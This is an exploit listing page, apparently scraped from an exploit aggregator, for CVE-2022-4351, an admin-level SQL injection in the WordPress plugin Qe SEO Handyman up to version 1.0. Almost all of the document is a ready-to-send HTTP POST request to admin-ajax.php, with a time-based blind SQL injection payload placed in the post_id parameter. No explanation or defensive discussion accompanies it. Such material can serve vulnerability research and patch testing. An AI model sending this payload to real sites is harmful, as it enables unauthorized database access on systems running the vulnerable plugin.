Exploit for Qe SEO Handyman <= 1.0 - Admin+ SQLi CVE-2022-4351

Name: Exploit for Qe SEO Handyman <= 1.0 - Admin+ SQLi CVE-2022-4351
Rating: 5 (50 reviews)

2022-12-08 | CVSS 0.5

## https://sploitus.com/exploit?id=WPEX-ID:2138F736-8A50-4390-A239-FCD1D736670A
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=all-pages-meta
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 122
Origin: http://localhost
Connection: close
Cookie: [admin+]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=save_all_page_meta&parms=description&meta_description=test2&post_id=2+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)